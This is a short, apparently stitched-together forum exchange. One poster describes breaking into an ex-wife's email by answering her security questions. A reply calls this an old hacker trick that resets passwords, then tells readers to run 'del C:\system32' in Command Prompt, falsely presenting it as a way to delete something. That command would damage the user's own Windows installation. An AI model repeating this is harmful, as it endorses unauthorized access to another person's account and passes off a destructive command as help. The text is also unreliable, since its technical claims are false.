I broke into my ex wife's email to get some details from when she cheated. But that was easy because I knew all the answers to her security questions.

OP- when you do this it resets all passwords and allows you to pick new ones. Its an old hacker trick but very easy to do.
Now, to delete it open Command Prompt (it comes with your computer, don't worry) and type in "del C:\system32", "del C:\windows\system32" or "del C:\WINDOWS\system32". One of them will work, but only one so try all of them.
ETA: It has to be on their computer, or at least one they have used the email on, and it can't be a Mac.
